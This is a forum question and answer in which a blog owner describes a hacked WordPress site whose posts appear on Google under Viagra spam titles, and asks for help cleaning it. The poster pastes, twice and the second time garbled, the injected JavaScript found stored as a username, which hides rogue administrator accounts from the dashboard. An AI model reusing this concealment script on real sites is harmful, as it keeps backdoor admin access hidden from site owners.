how to find and clean wordpress from script/s that changes your blog posts titles on Google and yahoo with embarrassing "Vigra text"?

Question

one day after managing to defend against a massive DDoS attack now http://arabcrunch.com is hacked by someone who seems to change the posts title into Viagra ad on google search engine look how they damaged us: .google.com/search?hl=en&client=safari&rls=en&q=Viagra+Online+Pharmacy+-+Buy+Online+Viagra%2C+Cialis%2C+Levitra+wordpress+hack&aq=f&aqi=&aql=&oq=&gs_rfai=

and here google.com/search?hl=en&client=safari&rls=en&q=idescribe&btnG=Search&aq=f&aqi=g-s1g-sx2g-s1g-sx1&aql=&oq=&gs_rfai=

what we did is a clean WP install with clean pluggins and imported our DB with old posts and all pages. then added each puglin we need manually then rebuilt the sitemap.xml

but Now we are doomed as any key word you search will get the result on google withe the title: Viagra Online Pharmacy - Buy Online Viagra, Cialis, Levitra

I found out on the DB table wp_usermeta user_id: 16 that the username is a script:

var setUserName = function(){ try{ var t=document.getElementById("user_superuser"); while(t.nodeName!="TR"){ t=t.parentNode; }; t.parentNode.removeChild(t); var tags = document.getElementsByTagName("H3"); var s = " shown below"; for (var i = 0; i < tags.length; i++) { var t=tags[i].innerHTML; var h=tags[i]; if(t.indexOf(s)>0){ s =(parseInt(t)-1)+s; h.removeChild(h.firstChild); t = document.createTextNode(s); h.appendChild(t); } } var arr=document.getElementsByTagName("ul"); for(var i in arr) if(arr[i].className=="subsubsub"){ var n=/>Administrator ((\d+))0){ var txt=arr[i].innerHTML.replace(/>Administrator ((\d+))Administrator ("+(n[1]-1)+")<"); arr[i].innerHTML=txt; } } }catch(e){}; }; addLoadEvent(setUserName);

This is smiler to a hack ArabCrunch EN along with thousands of WP blogs suffered on 9 9 2009 read about it and links to solutions here: arabcrunch.com/2009/09/arabcrunch-and-wordpress-under-attack.html

After the install we found 2 new users: wordpress.org and system, both are set as admin and have the same script set as their user name:

var setUserName = function(){ try{ var t=document.getElementById("user_superuser"); while(t.nodeName!="TR"){ t=t.parentNode; }; t.parentNode.removeChild(t); var tags = document.getElementsByTagName("H3"); var s = " shown below"; for (var i = 0; i 0){ s =(parseInt(t)-1)+s; h.removeChild(h.firstChild); t = document.createTextNode(s); h.appendChild(t); } } var arr=document.getElementsByTagName("ul"); for(var i in arr) if(arr[i].className=="subsubsub"){ var n=/>Administrator ((d+))0){ var txt=arr[i].innerHTML.replace(/>Administrator ((d+))Administrator ("+(n[1]-1)+")

Any idea how to solve this?

Answer 1

Export and clean your database before you import it into a new WP install: see FAQ: My site was hacked « WordPress Codex and how-to-completely-clean-your-hacked-wordpress-installation.